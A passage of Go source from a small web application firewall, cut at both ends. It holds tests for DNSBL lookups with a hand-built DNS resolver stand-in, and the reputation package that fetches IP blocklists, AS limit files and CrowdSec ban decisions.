listedName: tc.answer,
}}, p)
// The failure gives no verdict, and the zone is not asked
// again within a minute of it.
wantZones(t, dnsbl, listed)
synctest.Wait()
time.Sleep(time.Minute - time.Nanosecond)
wantZones(t, dnsbl, listed)
synctest.Wait()
wantQueries(t, dnsbl, 1, 1)
time.Sleep(time.Nanosecond)
wantZones(t, dnsbl, listed)
synctest.Wait()
wantQueries(t, dnsbl, 2, 2)
if verdicts := dnsbl.Snapshot(); len(verdicts) != 0 {
t.Errorf("verdicts %+v, want none", verdicts)
}
// One alert for the first failure; the cooldown holds back
// the second.
wantAlert(t, queue, alerts.Alert{
Time: time.Now().Add(-time.Minute),
Event: alerts.EventSourceFailure,
Reason: "asking a DNSBL zone failed",
Detail: map[string]any{"source": zone, "error": tc.error},
})
if !strings.Contains(log.String(), `"msg":"asking a DNSBL zone failed",`+
`"zone":"`+zone+`","error":"`+tc.error) {
t.Errorf("logged\n%s\nwant the failures", log.String())
}
})
})
}
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestAtMost1000QueriesUnderWay(t *testing.T) {
synctest.Test(t, func(t *testing.T) {
dnsbl := newDNSBL(&resolverStandIn{hanging: true}, dnsblParams(zone))
client := netip.MustParseAddr("198.18.0.0")
for range 1001 {
dnsbl.ListedBy(t.Context(), client)
client = client.Next()
}
synctest.Wait()
wantQueries(t, dnsbl, 1000, 0)
waitForTheResolver()
})
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestMetricsCountEachZonesQueriesAndThoseThatFailed(t *testing.T) {
synctest.Test(t, func(t *testing.T) {
resolver := &resolverStandIn{answers: map[string]answer{
listedName: {addrs: []string{listing}},
"99.2.0.192." + otherZone + ".": {rcode: serverFailure},
}}
dnsbl := newDNSBL(resolver, dnsblParams(zone, otherZone))
m := metrics.New(1, "app")
m.AddReputation(reputation.New(params()), dnsbl)
wantZones(t, dnsbl, listed)
synctest.Wait()
scraped := httptest.NewRecorder()
m.ServeHTTP(scraped, httptest.NewRequestWithContext(t.Context(), http.MethodGet,
"/", http.NoBody))
for series, want := range map[string]string{
"queries_total" + `{instance="app",source="` + zone + `"}`: "1",
"failures_total" + `{instance="app",source="` + zone + `"}`: "0",
"queries_total" + `{instance="app",source="` + otherZone + `"}`: "1",
"failures_total" + `{instance="app",source="` + otherZone + `"}`: "1",
} {
line := "\nsmallwebwaf_reputation_" + series + " " + want + "\n"
if !strings.Contains(scraped.Body.String(), line) {
t.Errorf("metrics\n%s\nwant%s", scraped.Body.String(), line)
}
}
})
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestZoneKeyIsMaskedInTheVerdictsTheFailuresAndTheMetrics(t *testing.T) {
const (
key = "abcdefghijklmnopqrstuvwxyz"
keyed = key + ".xbl.dq.spamhaus.net"
masked = "********.xbl.dq.spamhaus.net"
)
synctest.Test(t, func(t *testing.T) {
var log bytes.Buffer
queue := newQueue()
p := dnsblParams(keyed)
p.Alerts = queue
p.ProcessLog = slog.New(slog.NewJSONHandler(&log, nil))
dnsbl := newDNSBL(&resolverStandIn{answers: map[string]answer{
"99.2.0.192." + keyed + ".": {addrs: []string{listing}},
"100.2.0.192." + keyed + ".": {rcode: serverFailure},
}}, p)
m := metrics.New(1, "app")
m.AddReputation(reputation.New(params()), dnsbl)
// Both clients are asked about before either answer comes, so that
// the failure does not keep the zone from the other query.
wantZones(t, dnsbl, listed)
wantZones(t, dnsbl, unlisted)
synctest.Wait()
wantZones(t, dnsbl, listed, masked)
if got := waiting(queue); len(got) != 1 || got[0].Detail["source"] != masked {
t.Errorf("alerts waiting %+v, want the failure's, from %s", got, masked)
}
scraped := httptest.NewRecorder()
m.ServeHTTP(scraped, httptest.NewRequestWithContext(t.Context(), http.MethodGet,
"/", http.NoBody))
for name, shown := range map[string]string{
"the log": log.String(), "the metrics": scraped.Body.String(),
} {
if strings.Contains(shown, key) || !strings.Contains(shown, masked) {
t.Errorf("%s shows the key, or does not name the zone:\n%s", name, shown)
}
}
})
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestVerdictsKeptAcrossARestart(t *testing.T) {
synctest.Test(t, func(t *testing.T) {
resolver := &resolverStandIn{answers: map[string]answer{
listedName: {addrs: []string{listing}},
}}
dnsbl := newDNSBL(resolver, dnsblParams(zone))
fetched := time.Now()
wantZones(t, dnsbl, unlisted)
wantZones(t, dnsbl, listed)
synctest.Wait()
kept := dnsbl.Snapshot()
want := []reputation.Verdict{
{Zone: zone, Client: netip.MustParseAddr(listed), Listed: true, Fetched: fetched},
{Zone: zone, Client: netip.MustParseAddr(unlisted), Fetched: fetched},
}
if !reflect.DeepEqual(kept, want) {
t.Errorf("verdicts %+v, want %+v", kept, want)
}
// Restarted an hour later with what reputation.json keeps, it uses
// the verdicts, and asks the zone nothing, until the TTL has passed
// since they were fetched.
time.Sleep(time.Hour)
restarted := &resolverStandIn{}
again := newDNSBL(restarted, dnsblParams(zone))
again.Load(kept)
wantZones(t, again, listed, zone)
wantZones(t, again, unlisted)
synctest.Wait()
wantAsked(t, restarted)
time.Sleep(cacheTTL - time.Hour)
wantZones(t, again, listed)
synctest.Wait()
wantAsked(t, restarted, listedName)
})
}
func TestNeitherAVerdictOfAZoneNotNamedNorOnePastItsTTLIsKept(t *testing.T) {
t.Parallel()
now := time.Date(2026, 10, 7, 0, 0, 0, 0, time.UTC)
p := dnsblParams(zone)
p.Now = func() time.Time { return now }
dnsbl := reputation.NewDNSBL(p)
// The last verdict still in use, one fetched a TTL ago, and one of a
// zone SWWAF_DNSBL_ZONES does not name.
inUse := reputation.Verdict{
Zone: zone, Client: netip.MustParseAddr(listed), Listed: true,
Fetched: now.Add(-cacheTTL + time.Nanosecond),
}
stale := reputation.Verdict{
Zone: zone, Client: netip.MustParseAddr(unlisted), Fetched: now.Add(-cacheTTL),
}
notNamed := reputation.Verdict{
Zone: otherZone, Client: netip.MustParseAddr(listed), Listed: true, Fetched: now,
}
dnsbl.Load([]reputation.Verdict{notNamed, stale, inUse})
if got := dnsbl.Snapshot(); !reflect.DeepEqual(got, []reputation.Verdict{inUse}) {
t.Errorf("verdicts %+v, want only %+v", got, inUse)
}
}
func TestAtMost100000VerdictsKeptTheOneFetchedLongestAgoDroppedFirst(t *testing.T) {
t.Parallel()
now := time.Date(2026, 10, 7, 0, 0, 0, 0, time.UTC)
p := dnsblParams(zone)
p.Now = func() time.Time { return now }
dnsbl := reputation.NewDNSBL(p)
// 100,001 verdicts, listed by client, as reputation.json lists them,
// each fetched a millisecond before the one before it: the last is one
// too many.
const count = 100001
verdicts := make([]reputation.Verdict, 0, count)
client := netip.MustParseAddr("198.18.0.0")
for i := range count {
verdicts = append(verdicts, reputation.Verdict{
Zone: zone, Client: client, Fetched: now.Add(-time.Duration(i) * time.Millisecond),
})
client = client.Next()
}
dnsbl.Load(verdicts)
got := dnsbl.Snapshot()
if len(got) != count-1 || !slices.Contains(got, verdicts[0]) ||
slices.Contains(got, verdicts[count-1]) {
t.Errorf("%d verdicts kept, want all but the one fetched longest ago", len(got))
}
}
//nolint:paralleltest // one at a time, as the comment at the top of this file says
func TestQueriesGoToTheResolverSWWAFDNSBLResolverNames(t *testing.T) {
resolver := &resolverStandIn{answers: map[string]answer{
listedName: {addrs: []string{listing}},
}}
conn, err := (&net.ListenConfig{}).ListenPacket(t.Context(), "udp", "127.0.0.1:0")
if err != nil {
t.Fatalf("listen: %v", err)
}
served := make(chan struct{})
go func() {
resolver.serveUDP(conn)
close(served)
}()
t.Cleanup(func() {
_ = conn.Close()
<-served
})
p := dnsblParams(zone)
p.Resolver = netip.MustParseAddrPort(conn.LocalAddr().String())
// On the real clock: the stand-in answers at once, so only a test
// process held up for a whole minute would see the query fail.
p.Timeout = time.Minute
isListed, err := reputation.NewDNSBL(p).LookUp(zone, netip.MustParseAddr(listed))
if err != nil || !isListed {
t.Errorf("listed %t (%v), want true", isListed, err)
}
wantAsked(t, resolver, listedName)
}
// resolverStandIn is a stand-in for the resolver the zones are asked
// through. It answers each query by the name asked about, as answers
// gives, with no such name for a name answers does not give, and not at
// all while hanging. It notes each name asked about.
type resolverStandIn struct {
mu sync.Mutex
answers map[string]answer
hanging bool
names []string
}
// answer is how the stand-in answers a name: with an A record of each of
// addrs, or with the response code rcode, unless it is 0, for no error.
type answer struct {
addrs []string
rcode uint16
}
// What the stand-in reads of a query, and writes in its reply.
const (
// headerLength is the length of a DNS message's header, which the
// question follows: its id, its flags, and how many questions,
// answers and other records it holds, two bytes each.
headerLength = 12
// typeAndClass is the length of the type and the class that end a
// question, after its name.
typeAndClass = 4
// replyFlags mark a reply to a query that asked for recursion, which
// is available, with no error. The response code goes in their last
// four bits.
replyFlags = 0x8180
// maxMessage is the longest query read over UDP.
maxMessage = 1232
)
// set has the stand-in answer name with given.
func (s *resolverStandIn) set(name string, given answer) {
s.mu.Lock()
defer s.mu.Unlock()
s.answers[name] = given
}
// dial connects Go's resolver to the stand-in through an in-memory
// connection, on which it sends each query, and reads each reply, after
// its length, as over TCP.
func (s *resolverStandIn) dial(context.Context, string, string) (net.Conn, error) {
client, server := net.Pipe()
go s.serve(server)
return client, nil
}
// serve answers the queries that come on conn until the resolver closes
// it.
func (s *resolverStandIn) serve(conn net.Conn) {
defer func() {
_ = conn.Close()
}()
for {
var length [2]byte
_, err := io.ReadFull(conn, length[:])
if err != nil {
return
}
message := make([]byte, binary.BigEndian.Uint16(length[:]))
_, err = io.ReadFull(conn, message)
if err != nil {
return
}
reply, answered := s.reply(message)
if !answered {
continue // the resolver gives up, and closes conn
}
//nolint:gosec // a reply of a few dozen bytes
_, err = conn.Write(append(binary.BigEndian.AppendUint16(nil, uint16(len(reply))),
reply...))
if err != nil {
return
}
}
}
// serveUDP answers the queries that come on conn, each in a datagram, as
// a resolver does, until conn is closed.
func (s *resolverStandIn) serveUDP(conn net.PacketConn) {
message := make([]byte, maxMessage)
for {
n, from, err := conn.ReadFrom(message)
if err != nil {
return
}
reply, answered := s.reply(message[:n])
if answered {
_, _ = conn.WriteTo(reply, from)
}
}
}
// reply returns the stand-in's reply to message, a query, and false for
// none, while it hangs. It notes the name asked about.
func (s *resolverStandIn) reply(message []byte) ([]byte, bool) {
// The name is labels, each after its length, ended by a length of 0.
var labels []string
end := headerLength
for message[end] != 0 {
length := int(message[end])
labels = append(labels, string(message[end+1:end+1+length]))
end += 1 + length
}
end += 1 + typeAndClass
name := strings.Join(labels, ".") + "."
s.mu.Lock()
s.names = append(s.names, name)
given, found := s.answers[name]
hanging := s.hanging
s.mu.Unlock()
if hanging {
return nil, false
}
if !found {
given = answer{rcode: noSuchName}
}
// The query's id, the flags, one question, the answers, and no other
// records, then the question, as asked.
reply := slices.Clone(message[:2])
reply = binary.BigEndian.AppendUint16(reply, replyFlags|given.rcode)
reply = binary.BigEndian.AppendUint16(reply, 1)
//nolint:gosec // a handful of answers
reply = binary.BigEndian.AppendUint16(reply, uint16(len(given.addrs)))
reply = append(reply, 0, 0, 0, 0)
reply = append(reply, message[headerLength:end]...)
// An A record starts with the name asked about, by a pointer to it in
// the question, then its type, A, its class, IN, how long it may be
// kept, 60 seconds, and the length of its address, 4 bytes.
record := []byte{0xc0, headerLength, 0, 1, 0, 1, 0, 0, 0, 60, 0, 4}
for _, addr := range given.addrs {
reply = append(reply, record...)
reply = append(reply, netip.MustParseAddr(addr).AsSlice()...)
}
return reply, true
}
// dnsblParams returns the DNSBLParams of zones, with the tests' cache TTL
// and timeout, by the bubble's clock, with alerts to a queue that sends
// none.
func dnsblParams(zones ...string) reputation.DNSBLParams {
return reputation.DNSBLParams{
Zones: zones,
CacheTTL: cacheTTL,
Timeout: timeout,
Now: time.Now,
ProcessLog: slog.New(slog.DiscardHandler),
Alerts: newQueue(),
}
}
// waitForTheResolver waits, on the bubble's clock, an hour, until Go's
// resolver has given up on every stand-in that does not answer: it waits
// for a server as long as /etc/resolv.conf has it wait, a few seconds,
// even after the query was given up, and a bubble cannot end before it.
func waitForTheResolver() {
time.Sleep(time.Hour)
}
// newDNSBL returns the DNSBL of p, asking resolver.
func newDNSBL(resolver *resolverStandIn, p reputation.DNSBLParams) *reputation.DNSBL {
dnsbl := reputation.NewDNSBL(p)
dnsbl.SetDial(resolver.dial)
return dnsbl
}
// wantZones checks the zones whose verdict dnsbl says lists client, as a
// request from client finds them.
func wantZones(t *testing.T, dnsbl *reputation.DNSBL, client string, want ...string) {
t.Helper()
got := dnsbl.ListedBy(t.Context(), netip.MustParseAddr(client))
if !slices.Equal(got, want) {
t.Errorf("%s is listed by %v, want %v", client, got, want)
}
}
// wantQueries checks how many queries dnsbl made to zone, and how many of
// them failed.
func wantQueries(t *testing.T, dnsbl *reputation.DNSBL, queries, failures int) {
t.Helper()
if dnsbl.Queries(zone) != queries || dnsbl.Failures(zone) != failures {
t.Errorf("%d queries and %d failures, want %d and %d", dnsbl.Queries(zone),
dnsbl.Failures(zone), queries, failures)
}
}
// wantAsked checks the names the stand-in was asked about, in any order.
func wantAsked(t *testing.T, resolver *resolverStandIn, want ...string) {
t.Helper()
resolver.mu.Lock()
got := slices.Sorted(slices.Values(resolver.names))
resolver.mu.Unlock()
slices.Sort(want)
if !slices.Equal(got, want) {
t.Errorf("asked about %v, want %v", got, want)
}
}
+34
View File
@@ -0,0 +1,34 @@
package reputation
import (
"context"
"net"
"net/http"
"net/netip"
)
// SetTransport has l's fetches go through transport instead of the
// network.
func (l *Lists) SetTransport(transport http.RoundTripper) {
l.httpClient.Transport = transport
l.crowdSecClient.Transport = transport
}
// SetTransport has a's checks go through transport instead of the
// network.
func (a *AbuseIPDB) SetTransport(transport http.RoundTripper) {
a.httpClient.Transport = transport
}
// SetDial has d's queries go through dial instead of the network.
func (d *DNSBL) SetDial(
dial func(ctx context.Context, network, address string) (net.Conn, error),
) {
d.resolver = &net.Resolver{PreferGo: true, Dial: dial}
}
// LookUp asks zone about addr at once, as a query in the background does,
// and returns whether zone lists addr.
func (d *DNSBL) LookUp(zone string, addr netip.Addr) (bool, error) {
return d.lookUp(context.Background(), query{zone: zone, client: addr})
}
+652
View File
@@ -0,0 +1,652 @@
// Package reputation fetches the lists the settings name by URL: the
// blocklists of SWWAF_BLOCKLIST_URLS, the file of AS:percent lines
// SWWAF_ASN_LIMIT_PERCENT_URL names, and the decision list of the CrowdSec
// engine SWWAF_CROWDSEC_LAPI_URL names. It keeps the last good copy of
// each, whole, comment lines included, which is used while a fetch fails,
// and when each was last tried. It also asks the DNSBL zones of
// SWWAF_DNSBL_ZONES about clients, and keeps their verdicts, and checks
// clients with AbuseIPDB, and keeps their scores and the checks spent
// today. The state package writes all of these to reputation.json and
// reads them from it, so that a restart keeps them too.
package reputation
import (
"context"
"encoding/json"
"errors"
"fmt"
"io"
"log/slog"
"net/http"
"net/netip"
"slices"
"strings"
"sync"
"time"
"sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/config"
)
const (
// maxListBytes is the most of a list that is read. A longer one is a
// failure, so that a wrong URL cannot fill the memory.
maxListBytes = 16 << 20
// fetchTimeout bounds one fetch of a list.
fetchTimeout = time.Minute
// crowdSecRefresh is how long after the CrowdSec decision list was last
// fetched or tried it is fetched again: the engine is the operator's
// own, and makes and ends decisions all the time.
crowdSecRefresh = time.Minute
// mappedBits is the length of ::ffff:0.0.0.0/96, the netblock of every
// IPv4-mapped address.
mappedBits = 96
)
var (
errStatus = errors.New("the server answered")
errTooLong = errors.New("the list is longer than 16 MiB")
errNotNetblock = errors.New("is not an address or a netblock, such as 192.0.2.0/24")
errNotASNPercent = errors.New(
"is not an AS number, : and a percentage, such as AS64496:50")
errNotDecision = errors.New(
"does not give an address or a netblock and a duration, such as 4h0m0s")
)
// List is a list as reputation.json holds it: the URL it is fetched from,
// when it was last tried, the fetch failed or not, and its last good copy:
// when that was fetched, and its lines, as fetched, comment lines
// included, both left out while no fetch of it has succeeded.
type List struct {
URL string `json:"url"`
Tried time.Time `json:"tried"`
Fetched time.Time `json:"fetched,omitzero"`
Lines []string `json:"lines,omitzero"`
}
// Params are what New needs.
type Params struct {
// BlocklistURLs are the blocklists (SWWAF_BLOCKLIST_URLS), and
// ASNLimitPercentURL the file of AS:percent lines
// (SWWAF_ASN_LIMIT_PERCENT_URL), "" while it is unset.
BlocklistURLs []string
ASNLimitPercentURL string
// CrowdSecDecisionsURL is the CrowdSec decision list, "" while
// SWWAF_CROWDSEC_LAPI_URL is unset, fetched with CrowdSecKey
// (SWWAF_CROWDSEC_LAPI_KEY).
CrowdSecDecisionsURL string
CrowdSecKey string
// Refresh is how long after a list was last fetched or tried it is
// fetched again (SWWAF_BLOCKLIST_REFRESH), but for the CrowdSec decision
// list, which is fetched again crowdSecRefresh after.
Refresh time.Duration
// Now tells the time, normally time.Now in UTC.
Now func() time.Time
// ProcessLog receives each fetch of a list, and why one failed.
ProcessLog *slog.Logger
// Alerts receive a source_failure alert for each fetch that fails.
Alerts *alerts.Queue
}
// Lists are the lists Params names, each with its last good copy. They
// are safe for concurrent use.
type Lists struct {
params Params
httpClient *http.Client
// crowdSecClient fetches the CrowdSec decision list. It follows no
// redirect, so that the key goes to the engine alone: a redirect is a
// failure.
crowdSecClient *http.Client
mu sync.Mutex
// lists are by URL, one for each URL Params names.
lists map[string]*list
}
// list is one list: what reputation.json keeps of it, its last try, zero
// before the first, and its last good copy, what that copy says, and how
// many fetches of it failed.
type list struct {
kept List
entries entries
failures int
}
// entries are what the lines of a copy say: for a blocklist, the netblocks
// it names, with the lengths among them, for the file of AS:percent lines,
// the percentage it gives each AS number, and for the CrowdSec decision
// list, the decision on each netblock that ends last, with the lengths
// among them.
type entries struct {
netblocks map[netip.Prefix]bool
lengths []int
percents map[string]int64
decisions map[netip.Prefix]Decision
}
// Decision is a decision of the CrowdSec engine to ban a netblock: when
// it ends, and the scenario that made it, such as crowdsecurity/ssh-bf.
type Decision struct {
Expires time.Time
Scenario string
}
// New returns the lists, without a copy of any yet.
func New(params Params) *Lists {
l := &Lists{
params: params,
httpClient: &http.Client{},
crowdSecClient: &http.Client{
CheckRedirect: func(*http.Request, []*http.Request) error {
return http.ErrUseLastResponse
},
},
lists: map[string]*list{},
}
for _, listURL := range l.URLs() {
l.lists[listURL] = &list{kept: List{URL: listURL}}
}
return l
}
// URLs returns the URL of every list: the blocklists' in the order
// SWWAF_BLOCKLIST_URLS names them, then SWWAF_ASN_LIMIT_PERCENT_URL, then
// the CrowdSec decision list's.
func (l *Lists) URLs() []string {
urls := slices.Clone(l.params.BlocklistURLs)
if l.params.ASNLimitPercentURL != "" {
urls = append(urls, l.params.ASNLimitPercentURL)
}
if l.params.CrowdSecDecisionsURL != "" {
urls = append(urls, l.params.CrowdSecDecisionsURL)
}
return urls
}
// ListedBy returns the URLs of the blocklists whose copy lists addr, in
// the order SWWAF_BLOCKLIST_URLS names them.
func (l *Lists) ListedBy(addr netip.Addr) []string {
l.mu.Lock()
defer l.mu.Unlock()
var listedBy []string
for _, listURL := range l.params.BlocklistURLs {
if l.lists[listURL].entries.contain(addr) {
listedBy = append(listedBy, listURL)
}
}
return listedBy
}
// ASNLimitPercent returns the percentage the copy of the file of
// AS:percent lines gives asn, and whether it lists asn.
func (l *Lists) ASNLimitPercent(asn string) (int64, bool) {
if l.params.ASNLimitPercentURL == "" {
return 0, false
}
l.mu.Lock()
defer l.mu.Unlock()
percent, listed := l.lists[l.params.ASNLimitPercentURL].entries.percents[asn]
return percent, listed
}
// CrowdSecDecision returns the decision of the copy of the CrowdSec
// decision list on a netblock that holds addr and that ends last, and
// whether it is still in force at now. A decision that has ended no
// longer bans, even before the next fetch drops it.
func (l *Lists) CrowdSecDecision(addr netip.Addr, now time.Time) (Decision, bool) {
if l.params.CrowdSecDecisionsURL == "" {
return Decision{}, false
}
l.mu.Lock()
defer l.mu.Unlock()
kept := l.lists[l.params.CrowdSecDecisionsURL].entries
var last Decision
for _, length := range kept.lengths {
netblock, err := addr.Prefix(length)
if err != nil {
continue // an IPv6 netblock's length, past an IPv4 address's 32 bits
}
decision := kept.decisions[netblock]
if decision.Expires.After(last.Expires) {
last = decision
}
}
return last, now.Before(last.Expires)
}
// Fetched returns when the copy in use of the list at listURL was
// fetched, or zero while there is none.
func (l *Lists) Fetched(listURL string) time.Time {
l.mu.Lock()
defer l.mu.Unlock()
return l.lists[listURL].kept.Fetched
}
// Failures returns how many fetches of the list at listURL failed.
func (l *Lists) Failures(listURL string) int {
l.mu.Lock()
defer l.mu.Unlock()
return l.lists[listURL].failures
}
// Run fetches each list once it is due, as due tells, until ctx is done. A
// list never tried is fetched at once, and so is one that is due by its
// last try or copy read from reputation.json.
func (l *Lists) Run(ctx context.Context) {
if len(l.lists) == 0 {
return
}
for ctx.Err() == nil {
next := l.fetchDue(ctx)
timer := time.NewTimer(next.Sub(l.params.Now()))
select {
case <-ctx.Done():
case <-timer.C:
}
timer.Stop()
}
}
// Snapshot returns each list that has been tried, with its copy, if it
// has one, sorted by URL, as reputation.json lists them.
func (l *Lists) Snapshot() []List {
l.mu.Lock()
tried := make([]List, 0, len(l.lists))
for _, held := range l.lists {
if !held.kept.Tried.IsZero() {
tried = append(tried, held.kept)
}
}
l.mu.Unlock()
slices.SortFunc(tried, func(a, b List) int {
return strings.Compare(a.URL, b.URL)
})
return tried
}
// Load puts lists, read from reputation.json, in place of the last tries
// and copies held. A list Params does not name is dropped. A copy with a
// line that parse refuses is an error, and then nothing changes.
func (l *Lists) Load(lists []List) error {
found := make(map[string]entries, len(lists))
for _, kept := range lists {
_, named := l.lists[kept.URL]
if !named || kept.Fetched.IsZero() {
continue // dropped, or a list tried but never fetched, without a copy
}
read, err := l.parse(kept.URL, kept.Lines, kept.Fetched)
if err != nil {
return fmt.Errorf("the copy of %s: %w", kept.URL, err)
}
found[kept.URL] = read
}
l.mu.Lock()
defer l.mu.Unlock()
for listURL, held := range l.lists {
held.kept, held.entries = List{URL: listURL}, entries{}
}
for _, kept := range lists {
if _, named := l.lists[kept.URL]; named {
l.lists[kept.URL].kept, l.lists[kept.URL].entries = kept, found[kept.URL]
}
}
return nil
}
// fetchDue fetches each list that is due, one after another, and returns
// when the next is due. Once ctx has ended, it starts none, since a fetch
// cut off is noted as a try.
func (l *Lists) fetchDue(ctx context.Context) time.Time {
var next time.Time
for _, listURL := range l.URLs() {
due := l.due(listURL)
if ctx.Err() == nil && !l.params.Now().Before(due) {
l.fetch(ctx, listURL)
due = l.due(listURL)
}
if next.IsZero() || due.Before(next) {
next = due
}
}
return next
}
// due returns when the list at listURL is to be fetched: Refresh after it
// was last fetched or tried, the later of the two, or crowdSecRefresh
// after for the CrowdSec decision list.
func (l *Lists) due(listURL string) time.Time {
l.mu.Lock()
defer l.mu.Unlock()
held := l.lists[listURL]
last := held.kept.Fetched
if held.kept.Tried.After(last) {
last = held.kept.Tried
}
if listURL == l.params.CrowdSecDecisionsURL {
return last.Add(crowdSecRefresh)
}
return last.Add(l.params.Refresh)
}
// fetch fetches the list at listURL, and notes the try. A good copy takes
// the place of the one held. A failure leaves that in use, and is counted,
// logged and raised as a source_failure alert. A fetch cut off as ctx
// ends, as smallwebwaf stops, is no failure, but is still noted as a try,
// so that a restart waits for it: the server may have had its request.
func (l *Lists) fetch(ctx context.Context, listURL string) {
lines, err := l.get(ctx, listURL)
now := l.params.Now()
var found entries
if err == nil {
found, err = l.parse(listURL, lines, now)
}
cutOff := err != nil && ctx.Err() != nil
l.mu.Lock()
held := l.lists[listURL]
held.kept.Tried = now
if err == nil {
held.kept.Fetched, held.kept.Lines = now, lines
held.entries = found
} else if !cutOff {
held.failures++
}
l.mu.Unlock()
if cutOff {
return
}
if err != nil {
const failed = "fetching a list failed"
// Raised before it is logged, so that the alert is there once the
// log line is.
raiseFailure(l.params.Alerts, failed, listURL, err)
l.params.ProcessLog.Warn(failed, "url", listURL, "error", err.Error())
return
}
l.params.ProcessLog.Info("fetched a list", "url", listURL, "lines", len(lines))
}
// raiseFailure raises a source_failure alert into queue, with reason, and
// in its detail the source that failed, a list's URL, a zone with its key
// masked or abuseipdb, and err.
func raiseFailure(queue *alerts.Queue, reason, source string, err error) {
queue.Raise(alerts.Alert{
Event: alerts.EventSourceFailure,
Reason: reason,
Detail: map[string]any{"source": source, "error": err.Error()},
})
}
// get fetches the list at listURL, and returns its lines. The CrowdSec
// decision list is fetched with CrowdSecKey in the header X-Api-Key, where
// the engine looks for it, by crowdSecClient, which follows no redirect.
// An answer other than 200, or a list longer than maxListBytes, is a
// failure.
func (l *Lists) get(ctx context.Context, listURL string) ([]string, error) {
ctx, cancel := context.WithTimeout(ctx, fetchTimeout)
defer cancel()
req, err := http.NewRequestWithContext(ctx, http.MethodGet, listURL, http.NoBody)
if err != nil {
return nil, fmt.Errorf("make the request: %w", err)
}
client := l.httpClient
if listURL == l.params.CrowdSecDecisionsURL {
req.Header.Set("X-Api-Key", l.params.CrowdSecKey)
client = l.crowdSecClient
}
res, err := client.Do(req)
if err != nil {
// Do's error names the URL, which the log line and the alert name
// already: only what went wrong is kept.
return nil, fmt.Errorf("fetch the list: %w", errors.Unwrap(err))
}
defer func() {
_ = res.Body.Close()
}()
if res.StatusCode != http.StatusOK {
return nil, fmt.Errorf("%w %s", errStatus, res.Status)
}
body, err := io.ReadAll(io.LimitReader(res.Body, maxListBytes+1))
if err != nil {
return nil, fmt.Errorf("read the list: %w", err)
}
if len(body) > maxListBytes {
return nil, errTooLong
}
lines := []string{}
for line := range strings.Lines(string(body)) {
lines = append(lines, strings.TrimSuffix(line, "\n"))
}
return lines, nil
}
// parse reads the lines of the list at listURL, fetched at fetched: those
// of a blocklist, of the file of AS:percent lines, or of the CrowdSec
// decision list. In the first two, anything after a ; or a # on a line is
// left out, and so is a line left blank. Any other line that does not read
// is an error naming it by its number.
func (l *Lists) parse(
listURL string, lines []string, fetched time.Time,
) (entries, error) {
switch listURL {
case l.params.ASNLimitPercentURL:
return parsePercents(lines)
case l.params.CrowdSecDecisionsURL:
return parseDecisions(lines, fetched)
default:
return parseNetblocks(lines)
}
}
// parseNetblocks reads a blocklist's lines, each an address or a netblock
// as the settings take them.
func parseNetblocks(lines []string) (entries, error) {
found := entries{netblocks: map[netip.Prefix]bool{}}
for i, line := range lines {
text := withoutComment(line)
if text == "" {
continue
}
netblock, ok := parseNetblock(text)
if !ok {
return entries{}, fmt.Errorf("line %d %w", i+1, errNotNetblock)
}
found.netblocks[netblock] = true
if !slices.Contains(found.lengths, netblock.Bits()) {
found.lengths = append(found.lengths, netblock.Bits())
}
}
return found, nil
}
// parseNetblock reads text, a line of a blocklist, and reports whether it
// is an address or a netblock as the settings take them. A client's IPv4
// address is checked as IPv4, never IPv4-mapped, so an IPv4-mapped line,
// such as ::ffff:192.0.2.0/120, is read as the IPv4 address or netblock it
// stands for, 192.0.2.0/24, and a mapped netblock shorter than /96, which
// stands for none, is refused.
func parseNetblock(text string) (netip.Prefix, bool) {
netblock, err := config.ParseNetblock(text)
if err != nil {
return netip.Prefix{}, false
}
// The address as written: ParseNetblock's has the bits past the
// netblock's length cleared, the ::ffff among them below /96.
written, _, _ := strings.Cut(text, "/")
if addr, _ := netip.ParseAddr(written); !addr.Is4In6() {
return netblock, true
}
if netblock.Bits() < mappedBits {
return netip.Prefix{}, false
}
return netip.PrefixFrom(netblock.Addr().Unmap(), netblock.Bits()-mappedBits), true
}
// parsePercents reads the lines of the file of AS:percent lines, each an
// AS number, : and a percentage, as SWWAF_ASN_LIMIT_PERCENT takes them. An
// AS number listed more than once gets the lowest of its percentages.
func parsePercents(lines []string) (entries, error) {
found := entries{percents: map[string]int64{}}
for i, line := range lines {
text := withoutComment(line)
if text == "" {
continue
}
asnText, percentText, _ := strings.Cut(text, ":")
asn, asnErr := config.ParseASN(asnText)
percent, percentErr := config.ParsePercent(percentText)
if asnErr != nil || percentErr != nil {
return entries{}, fmt.Errorf("line %d %w", i+1, errNotASNPercent)
}
earlier, listed := found.percents[asn]
if !listed || percent < earlier {
found.percents[asn] = percent
}
}
return found, nil
}
// parseDecisions reads the lines of the CrowdSec decision list fetched at
// fetched: the engine's answer, a JSON list of its decisions in force,
// null while it has none. A decision of the type ban whose scope is Ip or
// Range, as CrowdSec names them, bans its value, an address or a netblock
// as parseNetblock reads it, until its duration, the time it had left as
// the engine answered, has passed since fetched. Any other decision, such
// as one to show a captcha or one on a country, is left out. A decision
// to ban whose value or duration does not read is an error naming it by
// its number.
func parseDecisions(lines []string, fetched time.Time) (entries, error) {
var answer []struct {
Duration string `json:"duration"`
Scenario string `json:"scenario"`
Scope string `json:"scope"`
Type string `json:"type"`
Value string `json:"value"`
}
err := json.Unmarshal([]byte(strings.Join(lines, "\n")), &answer)
if err != nil {
return entries{}, fmt.Errorf("read the answer: %w", err)
}
found := entries{decisions: map[netip.Prefix]Decision{}}
for i, decision := range answer {
if decision.Type != "ban" || (decision.Scope != "Ip" && decision.Scope != "Range") {
continue
}
netblock, ok := parseNetblock(decision.Value)
duration, err := time.ParseDuration(decision.Duration)
if !ok || err != nil {
return entries{}, fmt.Errorf("decision %d %w", i+1, errNotDecision)
}
expires := fetched.Add(duration)
if expires.After(found.decisions[netblock].Expires) {
found.decisions[netblock] = Decision{Expires: expires, Scenario: decision.Scenario}
}
if !slices.Contains(found.lengths, netblock.Bits()) {
found.lengths = append(found.lengths, netblock.Bits())
}
}
return found, nil
}
// withoutComment returns line without anything after a ; or a #, and
// without the spaces around what is left.
func withoutComment(line string) string {
text, _, _ := strings.Cut(line, ";")
text, _, _ = strings.Cut(text, "#")
return strings.TrimSpace(text)
}
// contain reports whether the netblocks of a blocklist's copy hold addr:
// whether addr, cut to one of their lengths, is one of them.
func (e entries) contain(addr netip.Addr) bool {
